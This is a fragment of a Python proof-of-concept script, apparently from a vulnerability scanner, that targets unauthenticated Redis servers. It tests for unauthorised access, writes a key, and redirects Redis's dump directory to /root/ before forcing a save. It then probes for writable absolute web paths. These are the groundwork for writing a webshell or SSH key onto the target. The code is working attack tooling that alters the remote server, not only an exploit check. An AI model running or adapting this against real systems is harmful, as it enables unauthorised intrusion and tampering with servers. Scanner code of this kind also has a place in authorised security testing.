(url)
| 19 | |
| 20 | |
| 21 | def poc(url): |
| 22 | url = host2IP(url) |
| 23 | ip = url.split(':')[0] |
| 24 | port = int(url.split(':')[-1]) if ':' in url else 6379 |
| 25 | |
| 26 | for web_port in [80, 443, 8080, 8443]: # 判断web服务 |
| 27 | if checkPortTcp(ip, web_port): |
| 28 | try: |
| 29 | real_url = redirectURL(ip + ':' + str(web_port)) |
| 30 | except Exception: |
| 31 | real_url = ip + ':' + str(web_port) |
| 32 | break # TODO 这里简单化处理,只返回了一个端口的结果 |
| 33 | else: |
| 34 | return False |
| 35 | |
| 36 | try: |
| 37 | r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5) |
| 38 | if 'redis_version' not in r.info(): # 判断未授权访问 |
| 39 | return False |
| 40 | key = randomString(5) |
| 41 | value = randomString(5) |
| 42 | r.set(key, value) # 判断可写 |
| 43 | r.config_set('dir', '/root/') # 判断对/var/www的写入权限(目前先判断为root) |
| 44 | r.config_set('dbfilename', 'dump.rdb') # 判断操作权限 |
| 45 | r.delete(key) |
| 46 | r.save() # 判断可导出 |
| 47 | except Exception, e: |
| 48 | return False |
| 49 | |
| 50 | # 枚举绝对路径 |
| 51 | path_list = [] |
| 52 | for each in ABSPATH_PREFIXES.LINUX: |
| 53 | try: |
| 54 | r.config_set('dir', each.rstrip('/')) |
| 55 | path_list.append(each) |
| 56 | for suffix in ABSPATH_SUFFIXES: |
| 57 | try: |
| 58 | r.config_set('dir', suffix.rstrip('/')) |
| 59 | path_list.append(each.rstrip('/') + '/' + suffix) |
| 60 | except Exception: |
| 61 | continue |
| 62 | except Exception: |
| 63 | continue |
| 64 | |
| 65 | if len(path_list): |
| 66 | return real_url + ' ' + ' '.join(path_list) |
| 67 | else: |
| 68 | return False |
nothing calls this directly
no test coverage detected